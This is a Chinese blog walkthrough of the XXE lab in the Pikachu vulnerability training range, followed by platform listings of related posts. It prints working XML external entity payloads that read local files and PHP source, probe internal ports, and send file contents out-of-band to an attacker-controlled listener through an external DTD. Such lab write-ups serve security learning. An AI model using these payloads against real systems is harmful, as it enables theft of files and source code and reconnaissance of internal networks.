pikachu--XXE漏洞

已于 2024-07-25 15:48:33 修改
阅读量151 收藏 2
点赞数 3
文章标签: 安全
于 2024-07-25 15:41:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63944205/article/details/140687969
版权

1.测试攻击

这里我们可以看到一个接受xml代码的输入框


 

<?xml version="1.0"?>
<!DOCTYPE foo[<!ENTITY xee "小家伙">]>
<foo>&xee;</foo>

输入上述代码,成功接收到我们的xml命令,测试成功

2.查看文件

在输入框输入这里的代码,注意,一个字符都不能错.

<?xml version="1.0"?>
<!DOCTYPE foo[
<!ENTITY xxe SYSTEM "file:///c:windows/win.ini">]>
<foo>&xxe;</foo>

成功查询

3.查看源码

<?xml version="1.0"?>
<!DOCTYPE foo[
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=xxe_1.php">]>
<foo>&xxe;</foo>

4.EXP DTD外部调用

###EXP DTD外部调用
网站根目录下创建evil.dtd文件
<!ENTITY evil SYSTEM "file:///c:/windows/win.ini">


####传入的参数
<?xml version="1.0"?>
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://127.0.0.1/evil.dtd"> 
%xxe;
]>
<foo>&evil;</foo>

5.探测内网存活主机与开放端口

这里我们修改端口测试开放,如果一直转圈然后断开则端口不开放

<?xml version="1.0"?>
<!DOCTYPE foo[
<!ELEMENT foo ANY>
<!ENTITY rabbit SYSTEM "http://127.0.0.1:8081">
]>
<x>&rabbit;</x>

6.EXP无回显探测

eee.dtd

这个文件的作用是将file的值传入kali

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://192.168.3.113:8888/?%file;'>">
%start;

传入参数:外带file到kali8888端口

<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://127.0.0.1/eee.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/flag.php">
%remote;
%send;]>

kali监听8888端口

解码flag

7,学会了吧,我们来实战一下

(1)我们看到username这里有回显,

(2)这里我们抓包试试

回显是username我们在这里修改

(3)发送到重放器得到结果

d

丢了没
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu-master
05-04
将下载的pikachu-master压缩包解压到指定目录,如`/opt`: ``` sudo tar -zxvf pikachu-master.tar.gz -C /opt ``` 进入解压后的目录: ``` cd /opt/pikachu-master ``` 5. 配置Pikachu 使用文本编辑器...
Pikachu--XXE漏洞
最新发布
weixin_53736204的博客
07-25 805
XML文档结构由XML声明,DTD(文档类型定义),文档元素三部分构成!--定义此文档是 note 类型的文档-->!ELEMENT--定义note元素有四个元素-->--定义to元素为"#PCDATA”类型-->!ELEMENT!ELEMENT--定义from元素为"#PCDATA”类型-->!ELEMENT--定义head元素为"#PCDATA"类型-->!ELEMENT--定义body元素为"#PCDATA"类型--></</</</</》》》XML特性《《《
pikachu靶场-10 XXE漏洞
weixin_52180702的博客
12-13 566
既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞
Pikachu-XXE
baynk的博客
11-19 4017
0x00 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从...
pikachu-XXE漏洞
ineedmoreMuQ的博客
07-25 161
你只要提交就可以获得被加码的数据然后自行解码即可!以上探测为网站有回显时的语句,那么一个网站若是没有回显我们该如何处理呢?这就需要神奇的base64编码出场了,加码调用解码即可观看秘密文件哦!我们在这一节需要掌握什么是xxe,具体请自行收集材料,博主也不清楚。我们应该首先搞一个服务器然后把文件我们输入的数据指向我们的服务器。众所周知php文件是不在前端显示的,如果我们想看怎么办呢。当你的元素内容是一个file协议,即可在回显处显示内容。但网站如果存在xxe漏洞的话,我们可以如下利用。这是我们要提交的数据。
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3755
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
Pikachu靶场之XXE漏洞
天天学安全专属博客
03-20 669
Pikachu靶场之XXE漏洞,XXE漏洞绕过
pikachu--xxe
qq_43660551的博客
07-12 205
发现这里采用post方式传输数据,且没对xml参数进行过滤,simplexml_load_string()函数将用户传入的xml直接转换为SimpleXMLElement对象,故这里存在被篡改参数内容,造成xxe漏洞。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。写一个正经的xml。
pikachu-XXE
Cwillchris的博客
11-01 2662
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 尝试PHP协议,构造代码如下 <?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "xxe"> ]> <name>&hacker;</name> 输入,显示如下,能正常执行命令 ...
Pikachu靶场通关笔记--XXE
weixin_45908624的博客
12-27 610
xxe
pikachu-master靶场
07-14
"pikachu-master靶场" 是一个专门为网络安全学习和实践设计的平台,它通常包含了一系列的挑战,旨在帮助用户提升其在黑客攻防、漏洞挖掘、安全防护等领域的技能。这个压缩包文件“pikachu-master”很可能包含了该...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 330
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 960
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 587
一站式云安全托管限时试用 开启全能高效攻防
防火墙--内容安全
banliyaoguai的博客
07-20 1220
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
服务攻防-框架安全漏洞复现)
m0_74402888的博客
07-21 568
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315。运行dockers容器。
防火墙之内容安全过滤技术篇
qq_67758645的博客
07-19 663
IMAP是一种在线协议,它不用将邮件下载到本地,可以在多台支持IMAP协议的设备上同时进行文件的操作,它会将用户的操作同步到服务器上,实现邮件的共享和同步。而IMAP协议支持双向通信,用户可以在不同的设备上对邮件进行标记、移动、删除等操作,这些操作会实时同步到服务器上,确保邮件状态的一致性。IMAP允许邮件保留在服务器上,用户可以在任何支持IMAP的设备上访问这些邮件,实现邮件的同步和共享。可以执行的动作 --- 告警,阻断,按权重操作 -- 我们可以给每个关键字设置权重值,之后根。(一定时间后会删除)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值